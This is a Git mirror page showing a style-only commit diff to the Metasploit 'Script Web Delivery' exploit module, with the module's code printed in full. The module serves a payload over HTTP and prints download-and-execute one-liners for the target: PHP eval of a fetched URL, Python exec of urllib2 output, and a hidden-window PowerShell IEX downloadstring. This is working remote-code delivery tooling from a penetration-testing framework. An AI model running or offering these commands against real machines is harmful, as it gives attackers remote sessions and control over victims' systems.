infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Apply rubocop changes to multi/script/web_delivery

bug/bundler_fix
Spencer McIntyre 2014-07-31 16:16:23 -04:00
parent 8af4c496c9
commit 5a25120660
1 changed files with 24 additions and 24 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

48
modules/exploits/multi/script/web_delivery.rb
View File

@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Script Web Delivery', 'Name' => 'Script Web Delivery',
'Description' => %q{ 'Description' => %q(
This module quickly fires up a web server that serves a payload. This module quickly fires up a web server that serves a payload.
The provided command will start the specified scripting language interpreter and then download and execute the The provided command will start the specified scripting language interpreter and then download and execute the
payload. The main purpose of this module is to quickly establish a session on a target payload. The main purpose of this module is to quickly establish a session on a target
@ -25,13 +25,13 @@ class Metasploit3 < Msf::Exploit::Remote
escalations supplied by Meterpreter. When using either of the PSH targets, ensure the escalations supplied by Meterpreter. When using either of the PSH targets, ensure the
payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute
x86 payloads on x64 machines. x86 payloads on x64 machines.
}, ),
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'Andrew Smith "jakx" <jakx.ppr@gmail.com>', 'Andrew Smith "jakx" <jakx.ppr@gmail.com>',
'Ben Campbell', 'Ben Campbell',
'Chris Campbell' #@obscuresec - Inspiration n.b. no relation! 'Chris Campbell' # @obscuresec - Inspiration n.b. no relation!
], ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
@ -39,12 +39,12 @@ class Metasploit3 < Msf::Exploit::Remote
}, },
'References' => 'References' =>
[ [
[ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
[ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ], ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
[ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
[ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'] ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
], ],
'Platform' => %w{python php win}, 'Platform' => %w(python php win),
'Targets' => 'Targets' =>
[ [
['Python', { ['Python', {
@ -62,38 +62,38 @@ class Metasploit3 < Msf::Exploit::Remote
['PSH_x64', { ['PSH_x64', {
'Platform' => 'win', 'Platform' => 'win',
'Arch' => ARCH_X86_64 'Arch' => ARCH_X86_64
}], }]
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 19 2013' 'DisclosureDate' => 'Jul 19 2013'
)) ))
end end
def on_request_uri(cli, request) def on_request_uri(cli, _request)
print_status("Delivering Payload") print_status('Delivering Payload')
if (target.name.include? "PSH") if target.name.include? 'PSH'
data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
else else
data = %Q|#{payload.encoded} | data = %Q(#{payload.encoded} )
end end
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) send_response(cli, data, 'Content-Type' => 'application/octet-stream')
end end
def primer def primer
url = get_uri() url = get_uri
print_status("Run the following command on the target machine:") print_status('Run the following command on the target machine:')
case target.name case target.name
when "PHP" when 'PHP'
print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"") print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
when "Python" when 'Python'
print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"") print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
when "PSH_x86", "PSH_x64" when 'PSH_x86', 'PSH_x64'
download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
print_line generate_psh_command_line({ print_line generate_psh_command_line(
:noprofile => true, noprofile: true,
:windowstyle => 'hidden', windowstyle: 'hidden',
:command => download_and_run command: download_and_run
}) )
end end
end end
end end